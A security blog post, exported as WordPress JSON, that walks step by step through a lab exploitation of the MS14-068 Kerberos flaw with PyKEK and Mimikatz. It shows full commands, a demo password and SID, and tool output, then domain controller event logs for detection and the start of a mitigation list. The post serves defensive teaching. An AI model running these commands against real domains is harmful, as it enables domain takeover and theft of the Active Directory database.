{"id":676,"date":"2014-12-07T17:25:41","date_gmt":"2014-12-07T22:25:41","guid":{"rendered":"http:\/\/adsecurity.org\/?p=676"},"modified":"2016-02-16T23:41:28","modified_gmt":"2016-02-17T04:41:28","slug":"exploiting-ms14-068-vulnerable-domain-controllers-successfully-with-the-python-kerberos-exploitation-kit-pykek","status":"publish","type":"post","link":"https:\/\/adsecurity.org\/?p=676","title":{"rendered":"Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)"},"content":{"rendered":"<h4><span style=\"text-decoration: underline;\">MS14-068 References:<\/span><\/h4>\n<ul>\n<li><a title=\"MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege\" href=\"https:\/\/adsecurity.org\/?p=525\">AD Kerberos Privilege Elevation Vulnerability: The Issue<\/a><\/li>\n<li><a title=\"Kerberos Vulnerability in MS14-068 Explained\" href=\"https:\/\/adsecurity.org\/?p=541\">Detailed Explanation of MS14-068<\/a><\/li>\n<li><a title=\"MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=660\">MS14-068 Exploit POC with the Python Kerberos Exploitation Kit (aka PyKEK)<\/a><\/li>\n<li><a title=\"PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works\" href=\"https:\/\/adsecurity.org\/?p=763\">Detecting PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works<\/a><\/li>\n<\/ul>\n<p>After re-working my lab a bit, I set about testing the MS14-068 POC that Sylvain Monn\u00e9 posted to GitHub a few days ago. 
I configured a Windows 7 workstation with <a href=\"https:\/\/www.python.org\/downloads\/release\/python-278\/\">Python 2.7.8<\/a> and downloaded the<a href=\"https:\/\/github.com\/bidord\/pykek\/archive\/master.zip\"> PyKEK zip<\/a> as well as the <a href=\"https:\/\/github.com\/gentilkiwi\/mimikatz\/releases\/\">Mimikatz zip<\/a> file.<\/p>\n<p>The MS14-068.py Python script (part of PyKEK) can be run on any computer that has connectivity to the target Domain Controller.<\/p>\n<p>I ran <a title=\"MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=660\">PyKEK<\/a> against a Windows Server 2008 R2 Domain Controller not patched for MS14-068 using Kali Linux as well as a domain-joined Windows 7 workstation.<\/p>\n<p><strong>Note: All exploit stages can be executed without an admin account and can be performed on any computer on the network (including computers not domain-joined).<br \/>\n<\/strong>Microsoft KB3011780 patches this issue.<strong><br \/>\n<\/strong><\/p>\n<h3><strong>Updates:<\/strong><\/h3>\n<p><strong>12\/13 Update:<\/strong> Added a section on <strong>How Does PyKEK Get a Forged PAC\u00a0 into a TGT?<\/strong> with information on how PyKEK generates the forged TGT (valid TGT with a forged PAC).<br \/>\n<strong>12\/8 Update:<\/strong> I added a <strong>Mitigation<\/strong> section at the end of the post as well as events from a patched Domain Controller when attempting to exploit (in the events section).<br \/>\n<strong>12\/14 Update<\/strong>: I successfully ran the exploit using a non-domain joined Windows computer on the network without admin credentials.<\/p>\n<h3><strong>MS14-068 Exploit Issues with Windows Server 2012 &amp; 2012\/R2:<\/strong><\/h3>\n<p><em>I also stood up one Windows Server 2012 and one Windows Server 2012 R2 Domain Controller in the same site as the two unpatched Windows Server 2008 R2 DCs. 
None of the Domain Controllers in my lab.adsecurity.org AD Forest are patched for MS14-068.<br \/>\nAfter successfully running the PyKEK script to generate the TGT, I was unable to get a TGS successfully to exploit the 2008 R2 DC. After shutting down the 2012 &amp; 2012R2 DCs, I could use the forged TGT to get a TGS and access the targeted 2008 R2 DC (ADSDC02).<br \/>\nPyKEK is only sometimes successful when there is an unpatched DC and a patched DC in the same Active Directory site. The same behavior is noted when there is an unpatched Windows Server 2008 R2 DC and a Windows Server 2012 DC in the same site. Successful exploit depends on what DC PyKEK connects to.<\/em><strong><br \/>\n<\/strong><\/p>\n<h3><span style=\"text-decoration: underline;\"><strong>Staging the Attack:<\/strong><\/span><\/h3>\n<p>The targeted user account in this post is &#8220;Darth Sidious&#8221; (darthsidious@lab.adsecurity.org). Note that this user is a member of Domain Users and a Workstation group. This group membership stays the same throughout the activity in this post (I took the screenshot after exploiting the DC). Assume that this user is an authorized user on the network and wants to get Domain Admin rights to perform nefarious actions. The user already has a valid domain account and knows the password for the domain. 
This is no different from an attacker spearphishing this user and stealing their credentials as they get local admin rights on the computer.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-DarthSidious-Account-MemberOf-Tab.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-690 aligncenter\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-DarthSidious-Account-MemberOf-Tab.png\" alt=\"ADS-DC-DarthSidious-Account-MemberOf-Tab\" width=\"317\" height=\"397\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-DarthSidious-Account-MemberOf-Tab.png 427w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-DarthSidious-Account-MemberOf-Tab-239x300.png 239w\" sizes=\"auto, (max-width: 317px) 100vw, 317px\" \/><\/a>Once the attacker has valid domain credentials (and local admin rights if a Python install is required) on a computer on the network, they can leverage PyKEK to generate a forged TGT by performing standard communication with the target (unpatched) DC.<\/p>\n<p>The <a title=\"MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=660\">PyKEK<\/a> ms14-068.py Python script needs some information to successfully generate a forged TGT:<\/p>\n<ul>\n<li>User Principal Name (UPN) [-u]: darthsidious@lab.adsecurity.org<\/li>\n<li>User Password [-p]: TheEmperor99!<\/li>\n<li>User Security Identifier (SID) [-s]: S-1-5-21-1473643419-774954089-2222329127-1110<\/li>\n<li>Targeted Domain Controller [-d]: adsdc02.lab.adsecurity.org<\/li>\n<\/ul>\n<p>The SID can be found by running the &#8220;whoami&#8221; command while logged in as the target user.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/DarthSidiousWhoAmI.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-702\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/DarthSidiousWhoAmI.png\" 
alt=\"DarthSidiousWhoAmI\" width=\"568\" height=\"417\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/DarthSidiousWhoAmI.png 877w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/DarthSidiousWhoAmI-300x219.png 300w\" sizes=\"auto, (max-width: 568px) 100vw, 568px\" \/><\/a><\/p>\n<p>You can also get this information from PowerShell by running:<\/p>\n<blockquote><p><em>[Security.Principal.WindowsIdentity]::GetCurrent()<\/em><\/p><\/blockquote>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PowerShell-WhoAMI-DS.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-733\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PowerShell-WhoAMI-DS.png\" alt=\"ADS-PowerShell-WhoAMI-DS\" width=\"552\" height=\"148\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PowerShell-WhoAMI-DS.png 995w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PowerShell-WhoAMI-DS-300x80.png 300w\" sizes=\"auto, (max-width: 552px) 100vw, 552px\" \/><\/a><\/p>\n<p>As I noted in <a title=\"MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=660\">my previous post on PyKEK<\/a>, the following group memberships are included in the forged TGT:<\/p>\n<ul>\n<li>Domain Users (513)<\/li>\n<li>Domain Admins (512)<\/li>\n<li>Schema Admins (518)<\/li>\n<li>Enterprise Admins (519)<\/li>\n<li>Group Policy Creator Owners (520)<\/li>\n<\/ul>\n<h3><span style=\"text-decoration: underline;\"><strong>Phase 1: Forging a TGT:<\/strong><\/span><\/h3>\n<p>Here&#8217;s a screenshot of the exploit working in Kali Linux (1.09a).<\/p>\n<p><!--more--><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-PyKEk-Exploit.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-685 aligncenter\" 
src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-PyKEk-Exploit.png\" alt=\"ADS-Kali-MS14068-PyKEk-Exploit\" width=\"509\" height=\"345\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-PyKEk-Exploit.png 797w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-PyKEk-Exploit-300x203.png 300w\" sizes=\"auto, (max-width: 509px) 100vw, 509px\" \/><\/a><\/p>\n<p>After generating the ccache file containing the forged and validated TGT Kerberos ticket, the ccache file can be copied to a Windows computer to run Mimikatz.<\/p>\n<p>It also works on Windows running Python (command is in bold &amp; italics).<\/p>\n<blockquote><p><em><strong>c:\\Temp\\pykek&gt;ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org<\/strong><\/em><\/p>\n<p>[+] Building AS-REQ for adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n[+] Sending AS-REQ to adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n[+] Receiving AS-REP from adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n[+] Parsing AS-REP from adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n[+] Building TGS-REQ for adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n[+] Sending TGS-REQ to adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n[+] Receiving TGS-REP from adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n[+] Parsing TGS-REP from adsdc02.lab.adsecurity.org&#8230; Done!<br \/>\n<strong>[+] Creating ccache file &#8216;TGT_darthsidious@lab.adsecurity.org.ccache&#8217;&#8230; Done!<\/strong><\/p><\/blockquote>\n<p>Here&#8217;s the screenshot of the ms14-068 exploit working on Windows (does not require admin rights).<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-WrkLocalAdmin-MS14068Exploit-TGTGeneration1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-687\" 
src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-WrkLocalAdmin-MS14068Exploit-TGTGeneration1.png\" alt=\"ADS-WrkLocalAdmin-MS14068Exploit-TGTGeneration\" width=\"750\" height=\"463\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-WrkLocalAdmin-MS14068Exploit-TGTGeneration1.png 835w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-WrkLocalAdmin-MS14068Exploit-TGTGeneration1-300x185.png 300w\" sizes=\"auto, (max-width: 750px) 100vw, 750px\" \/><\/a>I ran Wireshark on the targeted Domain Controller. Here&#8217;s the pcap (zipped) of the network traffic from the PyKEK ms14-068.py script: <a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADSecurityOrg-MS14068-Exploit-KRBPackets.zip\">ADSecurityOrg-MS14068-Exploit-KRBPackets<\/a><\/p>\n<p>Note that I have generated a forged TGT with a single, stolen domain account.<\/p>\n<p>The next step is to use this forged TGT, so I log on to a computer as the <em>local admin account<\/em> with network access to the targeted Domain Controller.<\/p>\n<p>Whoami shows I am logged on as admin on the computer ADSWKWIN7.<\/p>\n<p>Klist shows there are no Kerberos tickets in memory for this user (there wouldn&#8217;t be, since this is a local admin account).<\/p>\n<p>The PyKEK ms14-068.py Python script saves the forged TGT to a ccache file (TGT_darthsidious@lab.adsecurity.org.ccache) in the current working directory (c:\\temp\\pykek shown above).<\/p>\n<h3><span style=\"text-decoration: underline;\"><strong>How Does PyKEK Get a Forged PAC into a TGT?<\/strong><\/span><\/h3>\n<p>The Python script performs a TGT request (Kerberos Authentication Service Request aka AS-REQ) and, instead of requesting a TGT with a PAC (the default AS-REQ), PyKEK requests a TGT with no PAC from the Domain Controller.<\/p>\n<p>Once the script receives the valid TGT without a PAC from the DC, the script generates a PAC (with the group membership listed above) and packages it in encrypted authorization data 
as part of a TGS request to the DC (Kerberos Ticket Granting Service Request aka TGS-REQ) to obtain another TGT (a new one with the PyKEK-generated PAC).<br \/>\n&#8220;The vulnerable KDC will verify it with MD5 and give you another TGT with a PAC in it&#8221;.<br \/>\nThis is the TGT that PyKEK saves to the ccache file used for Stage 2.<\/p>\n<p>Since PyKEK communicates with the Domain Controller for valid TGTs, the TGT is a valid ticket (other than the forged PAC it includes). To summarize, there are two TGTs involved in the process: the original one without a PAC, returned as a result of the first AS-REQ, and a second one the DC delivers in the TGS-REP with the PyKEK-generated PAC.<\/p>\n<p><em>NOTE: The TGT is technically not modified by PyKEK since it is encrypted by the KDC account (KRBTGT). The process the script uses results in a valid TGT with the PAC PyKEK created that is accepted by an unpatched DC. The genius part of this is that PyKEK uses the Kerberos AS &amp; TGS exchanges to forge a PAC and have the DC place it into a new user TGT. Then, when the TGT is presented later on in Stage 2 for a valid TGS, the PAC is accepted and its values are carried on into the new TGS for a Kerberos service in AD.<\/em><\/p>\n<p><strong>Packet detail and additional information are posted in the post &#8220;<a title=\"PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works\" href=\"https:\/\/adsecurity.org\/?p=763\">PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works<\/a>&#8221;<\/strong><\/p>\n<p>Benjamin Delpy&#8217;s <a href=\"http:\/\/blog.gentilkiwi.com\/mimikatz\">Mimikatz<\/a> presentation at Passwords 2014 describes the MS14-068 exploit (slide below extracted from his presentation). You can watch Benjamin&#8217;s presentation <a href=\"http:\/\/new.livestream.com\/NTNU\/passwords14\/videos\/70751388?t=1418474079423\">here<\/a> (2nd video from the top). 
I updated my earlier <a href=\"https:\/\/adsecurity.org\/?p=525\">MS14-068 post that describes the issue with PAC validation<\/a> based on information Benjamin provided during this presentation.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/py-Passwords2014Slides-PACsig1-MS14068.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-744 aligncenter\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/py-Passwords2014Slides-PACsig1-MS14068.png\" alt=\"py-Passwords2014Slides-PACsig1-MS14068\" width=\"749\" height=\"421\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/py-Passwords2014Slides-PACsig1-MS14068.png 1334w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/py-Passwords2014Slides-PACsig1-MS14068-300x168.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/py-Passwords2014Slides-PACsig1-MS14068-1024x575.png 1024w\" sizes=\"auto, (max-width: 749px) 100vw, 749px\" \/><\/a>(Thanks Benjamin for your continued efforts to make sure I get this right. 
\ud83d\ude42 )<\/p>\n<p>&nbsp;<\/p>\n<h3><span style=\"text-decoration: underline;\"><strong>Phase 2: Injecting the forged TGT and gaining a valid TGS:<\/strong><\/span><\/h3>\n<p>After the forged Kerberos TGT ticket is generated, it&#8217;s time to inject it into the current user session using <a href=\"https:\/\/adsecurity.org\/?p=556\">Mimikatz <\/a>(command is in bold &amp; italics).<\/p>\n<blockquote><p><em><strong>c:\\Temp\\pykek&gt;c:\\temp\\mimikatz\\mimikatz.exe &#8220;kerberos::ptc c:\\temp\\TGT_darthsidious@lab.adsecurity.org.ccache&#8221; exit<\/strong><\/em><\/p>\n<p>.#####.\u00a0\u00a0 mimikatz 2.0 alpha (x64) release &#8220;Kiwi en C&#8221; (Nov 20 2014 01:35:45)<br \/>\n.## ^ ##.<br \/>\n## \/ \\ ##\u00a0 \/* * *<br \/>\n## \\ \/ ##\u00a0\u00a0 Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )<br \/>\n&#8216;## v ##&#8217;\u00a0\u00a0 http:\/\/blog.gentilkiwi.com\/mimikatz\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 (oe.eo)<br \/>\n&#8216;#####&#8217;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 with 15 modules * * *\/<\/p>\n<p>mimikatz(commandline) # kerberos::ptc c:\\temp\\TGT_darthsidious@lab.adsecurity.org.ccache<br \/>\nPrincipal : (01) : darthsidious ; @ LAB.ADSECURITY.ORG<br \/>\nData 0<br \/>\nStart\/End\/MaxRenew: 12\/7\/2014 3:10:30 PM ; 12\/8\/2014 1:10:30 AM ; 12\/14\/2014 3:10:30 PM<br \/>\nService Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG<br \/>\nTarget Name\u00a0 (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG<br \/>\nClient Name\u00a0 (01) : darthsidious ; @ LAB.ADSECURITY.ORG<br \/>\nFlags 50a00000\u00a0\u00a0\u00a0 : pre_authent ; renewable ; proxiable ; forwardable ;<br \/>\nSession Key\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0x00000017 &#8211; rc4_hmac_nt<br \/>\naf5e7b47316c4cebae0a7ead04059799<br 
\/>\nTicket\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0x00000000 &#8211; null\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; kvno = 2\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [&#8230;]<br \/>\n<strong>\u00a0 * Injecting ticket : OK<\/strong><\/p>\n<p>mimikatz(commandline) # exit<br \/>\nBye!<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<p>Note that since I am injecting the forged TGT which states that I am a member of Domain Admins, Enterprise Admins, etc into my session, when this TGT is passed to an unpatched DC for a Kerberos service ticket (TGS), the service ticket will show I am a member of these groups. When the TGS is presented to a service, the user account is treated as if it is a member of these groups, though viewing the group membership shows the user is conspicuously absent. This enables an attacker to act as if they are a member of groups when they are not.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-Mimikatz-TGTInjection-AccesstoDC-NTDS.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-684\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-Mimikatz-TGTInjection-AccesstoDC-NTDS.png\" alt=\"ADS-Kali-MS14068-Mimikatz-TGTInjection-AccesstoDC-NTDS\" width=\"632\" height=\"637\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-Mimikatz-TGTInjection-AccesstoDC-NTDS.png 960w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-Mimikatz-TGTInjection-AccesstoDC-NTDS-150x150.png 150w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Kali-MS14068-Mimikatz-TGTInjection-AccesstoDC-NTDS-297x300.png 297w\" sizes=\"auto, (max-width: 632px) 100vw, 632px\" \/><\/a><\/p>\n<p>I ran WireShark on the targeted Domain Controller. 
Here&#8217;s the pcap (zipped) of the network traffic using the forged TGT ticket via <a href=\"https:\/\/adsecurity.org\/?p=556\">Mimikatz <\/a>and connecting to the Domain Controller&#8217;s Admin$ share: <a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADSecurityOrg-MS14068-Exploit-KRBPackets-TGTInjection-And-DC-AdminShare-Access.zip\">ADSecurityOrg-MS14068-Exploit-KRBPackets-TGTInjection-And-DC-AdminShare-Access<\/a><\/p>\n<p>Once I have successfully injected the forged TGT into my session (remember, I am logged onto a domain-joined Windows 7 computer as the <strong>local admin &#8211; not with AD domain credentials<\/strong>), I leverage this to connect to the Domain Controller and gain access to the Active Directory database (ntds.dit).<br \/>\nNote: a local admin account is NOT required. This stage can be executed with any account and can be run from a PowerShell window.<\/p>\n<h3><span style=\"text-decoration: underline;\"><strong>Domain Controller Event Logs from the Attack:<br \/>\n<\/strong><\/span><\/h3>\n<h4><strong><span style=\"text-decoration: underline;\">Unpatched Domain Controller Logs During the PyKEK MS14-068 Attack:<\/span><\/strong><\/h4>\n<p>Here are the event logs on the targeted Domain Controller when using the forged TGT to get a TGS in order to access the Domain Controller&#8217;s admin$ share and locate the AD database files:<\/p>\n<p><strong>Event 4769<\/strong> shows darthsidious@lab.adsecurity.org requesting a TGS Kerberos service ticket using the forged TGT.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event1-4769.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-691\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event1-4769.png\" alt=\"ADS-DC-MS14068-Event1-4769\" width=\"519\" height=\"516\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event1-4769.png 636w, 
https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event1-4769-150x150.png 150w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event1-4769-300x298.png 300w\" sizes=\"auto, (max-width: 519px) 100vw, 519px\" \/><\/a><\/p>\n<p><strong>Event 4769<\/strong> shows darthsidious@lab.adsecurity.org requesting a TGS Kerberos service ticket using the forged TGT.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event2-4769.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-692\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event2-4769.png\" alt=\"ADS-DC-MS14068-Event2-4769\" width=\"513\" height=\"513\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event2-4769.png 635w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event2-4769-150x150.png 150w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event2-4769-300x300.png 300w\" sizes=\"auto, (max-width: 513px) 100vw, 513px\" \/><\/a><\/p>\n<p><strong>Event 4624 <\/strong>shows darthsidious@lab.adsecurity.org using the TGS service ticket to logon to the target Domain Controller.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event3-4624.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-693\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event3-4624.png\" alt=\"ADS-DC-MS14068-Event3-4624\" width=\"509\" height=\"505\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event3-4624.png 639w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event3-4624-150x150.png 150w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event3-4624-300x297.png 300w\" sizes=\"auto, (max-width: 509px) 100vw, 509px\" \/><\/a><\/p>\n<p><strong>Event 5140 
<\/strong>shows darthsidious@lab.adsecurity.org using the TGS service ticket to connect to the target Domain Controller&#8217;s Admin$ share (net use \\\\adsdc02.lab.adsecurity.org\\admin$), to which only an administrator has access.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event4-5140.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-694\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event4-5140.png\" alt=\"ADS-DC-MS14068-Event4-5140\" width=\"500\" height=\"500\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event4-5140.png 636w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event4-5140-150x150.png 150w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event4-5140-300x300.png 300w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" \/><\/a><\/p>\n<p><strong>Event 4672 <\/strong>shows darthsidious@lab.adsecurity.org successfully authenticating to (and logging on to) the target Domain Controller, to which only an administrator has access.<\/p>\n<p><em>Note that this user has SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeTakeOwnership, etc., <strong>showing the user has full Admin access to this computer. 
It&#8217;s Game Over at this point.<\/strong><\/em><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event5-4672.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-695\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event5-4672.png\" alt=\"ADS-DC-MS14068-Event5-4672\" width=\"486\" height=\"482\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event5-4672.png 638w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event5-4672-150x150.png 150w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-Event5-4672-300x297.png 300w\" sizes=\"auto, (max-width: 486px) 100vw, 486px\" \/><\/a><\/p>\n<h4><strong><span style=\"text-decoration: underline;\">MS14-068 Patched Domain Controller Logs During the PyKEK MS14-068 Attack:<\/span><\/strong><\/h4>\n<h5>Here&#8217;s what it looks like when a client attempts to use a forged TGT to get a Kerberos service ticket (TGS) when communicating with a patched DC:<\/h5>\n<p><strong>Event 4769 <\/strong>shows darthsidious@lab.adsecurity.org attempting to get a Kerberos service ticket (TGS) for a CIFS (SMB) share on the Domain Controller (adsdc01.lab.adsecurity.org). The TGS request fails because the DC (adsdc01.lab.adsecurity.org) is patched, and the DC logs this failure in the security event log as a failed 4769 event.<br \/>\n
<strong>NOTE: This is the event Microsoft recommends you monitor closely after applying KB3011780 (the MS14-068 patch).<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent1-4769Failure.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-724\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent1-4769Failure.png\" alt=\"ADS-DC-MS14068-PatchedEvent1-4769Failure\" width=\"481\" height=\"426\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent1-4769Failure.png 711w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent1-4769Failure-300x265.png 300w\" sizes=\"auto, (max-width: 481px) 100vw, 481px\" \/><\/a><\/p>\n<p><strong>Event 4776 <\/strong>shows an audit failure for the computer and the username logged into the computer. This event is associated with the <strong>4769<\/strong> event above. Since I was logged on as the local administrator account &#8220;admin&#8221;, it shows in the log. This is a red flag. <em>However, I could have created a local admin account on the box with the same name as a Domain Admin in the domain and it may not be scrutinized as much. 
Check your logs!<\/em><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent2-4776-Failure.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-725\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent2-4776-Failure.png\" alt=\"ADS-DC-MS14068-PatchedEvent2-4776-Failure\" width=\"490\" height=\"435\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent2-4776-Failure.png 708w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-DC-MS14068-PatchedEvent2-4776-Failure-300x266.png 300w\" sizes=\"auto, (max-width: 490px) 100vw, 490px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>This concludes the lesson on how to own an Active Directory forest in less than 5 minutes with only a user account and a connected Windows computer (and associated admin account).<\/p>\n<h3><span style=\"text-decoration: underline;\"><strong>Mitigations:<\/strong><\/span><\/h3>\n<ol>\n<li><strong>Patch all Domain Controllers<\/strong> with KB3011780 in every AD domain. 
